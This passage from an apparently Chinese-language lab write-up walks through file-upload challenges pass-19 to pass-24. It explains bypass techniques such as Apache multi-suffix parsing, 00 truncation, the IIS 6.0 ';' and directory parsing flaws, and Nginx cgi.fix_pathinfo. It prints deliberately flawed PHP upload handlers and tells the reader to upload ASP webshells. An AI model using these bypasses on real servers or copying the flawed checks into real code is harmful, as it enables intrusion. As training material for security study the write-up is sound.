        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
绕过方法:这一关保存用的文件名(save_name)完全由用户通过 POST 控制,只对 pathinfo() 取出的后缀做黑名单比对,可以从文件名或者目录名两方面构造。
- Apache 多后缀解析:保存为 phpinfo.php.xxx,pathinfo() 取到的后缀是 xxx,不在黑名单;如果 Apache 是用 AddHandler 把 .php 交给 PHP 的,它会从右往左找到第一个认识的后缀,把文件当 PHP 执行(用 SetHandler/FilesMatch 限定为 .php 结尾的配置则不行)。
- Windows 文件存储特性:在后缀后面加 . 或空格(如 shell.php. 、shell.php ),落地时会被自动去掉。
- 00 截断:同 pass-11/12,受 PHP 版本限制。
- /. 绕过:保存为 shell.php/. ,pathinfo() 取不到后缀,而 move_uploaded_file() 会忽略路径末尾的 /.(这是函数本身的特性,和 Windows 存储特性不同)。
- 通过 Burp 抓包修改数据包:save_name 写成 upload-20.php%00.jpg,即在后缀后面加上 .jpg,再用 %00 进行截断(save_name 走 POST,要在 Hex 视图里写入原始的 0x00)。
- 上传 .php 文件并保存为 .jpg 可以成功;上传 .jpg 文件而保存为 .php 则失败。这说明校验的是保存时的文件名。接下来判断是白名单还是黑名单:上传 .php,保存名随便写一个后缀,或者干脆不写后缀,都能成功,说明是黑名单校验,那么绕过方式就很多了。
pass-20
IIS6.0解析漏洞(一):
IIS6.0解析漏洞分两种
1、目录解析
以 *.asp 命名的文件夹里的文件都会被当成 ASP 文件执行。
2、文件解析
.asp;.jpg 这种畸形文件名中 ";" 后面的部分会被直接忽略,也就是说当成 .asp 文件执行。
IIS 6.0 默认可执行的后缀除了 .asp 还包含 .asa、.cer、.cdx 这三种。
- 这一关直接上传 asp 一句话木马,然后用菜刀连接即可。
pass-21
// Pass-21: whitelist on the LAST dot-separated segment plus MIME/size checks,
// with the file saved under its raw client name (IIS 6.0 target).
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
// "shell.asp;.jpg" splits into ["shell", "asp;", "jpg"]; only "jpg" is checked.
$extension = end($temp);     // file extension
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // under 200 kB
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
        // NOTE: the existence check looks in "./b/image/" but the move below writes
        // to "image/" -- the two paths are not obviously the same.
        if (file_exists("./b/image/" . $_FILES["file"]["name"]))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // Write to the upload directory when the file does not exist yet; the
            // client-supplied name is kept, so "shell.asp;.jpg" lands as-is.
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
            echo "文件存储在: " . "./b/image/" . $_FILES["file"]["name"];
            echo "";
        }
    }
}
else
{
    echo "非法的文件格式";
}
- 白名单取的是 explode('.') 之后的最后一段,所以 shell.asp;.jpg 的"后缀"是 jpg,能通过校验;文件又以原始文件名保存,在 IIS 6.0 下 ";" 之后的部分被忽略,按 shell.asp 解析,由此 getshell。
pass-22
- 这一关没有贴代码,直接上传一个包含 asp 一句话木马的图片,再利用 IIS 6.0 的解析漏洞访问即可。
pass-23
// Pass-23: server-chosen filename (timestamp.jpg), but the destination directory
// is named "a.asp" -- the IIS 6.0 directory-parsing case.
$allowedExts = array("jpg");
$time = time();
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp);     // file extension
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800)   // under 200 kB
&& in_array($extension, $allowedExts))
{
    if ($_FILES["file"]["error"] > 0)
    {
        echo "错误:: " . $_FILES["file"]["error"] . "";
    }
    else
    {
        echo "上传文件名: " . $_FILES["file"]["name"] . "";
        echo "文件类型: " . $_FILES["file"]["type"] . "";
        echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
        if (file_exists("C:/Inetpub/wwwroot/c/image/a.asp/".$time.".jpg"))
        {
            echo $_FILES["file"]["name"] . " 文件已经存在。 ";
        }
        else
        {
            // The name is fixed by the server, but every file under "a.asp/" is
            // treated as ASP by IIS 6.0 regardless of its ".jpg" extension.
            $ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/a.asp/".$time.".jpg");
            echo "文件存储在: " . "./c/image/a.asp/".$time.".jpg";
            echo "";
        }
    }
}
else
{
    echo "非法的文件格式";
}
- 这题主要是教一个姿势:文件名由服务端定死(时间戳 + .jpg),但保存目录是 image/a.asp/,上传一个包含 asp 一句话木马的图片即可。
- 由此可以看出,在 IIS 6.0 下只要目录名以 .asp 结尾,目录里的文件不论后缀都会被当成 ASP 解析,也就是上面说的目录解析。
pass-24
- 本题考查的是 Nginx + PHP-FPM 的 CGI 解析漏洞(cgi.fix_pathinfo=1 且没有用 security.limit_extensions 限制可执行后缀时):
在图片中嵌入 PHP 代码后上传,然后访问 xxx.jpg/1.php:Nginx 把整个 URI 交给 FPM,1.php 不存在时 PHP 按 PATH_INFO 规则回退到 xxx.jpg 并把它当作 PHP 执行。上传一个图片马即可。
我的个人博客
孤桜懶契:http://gylq.github.io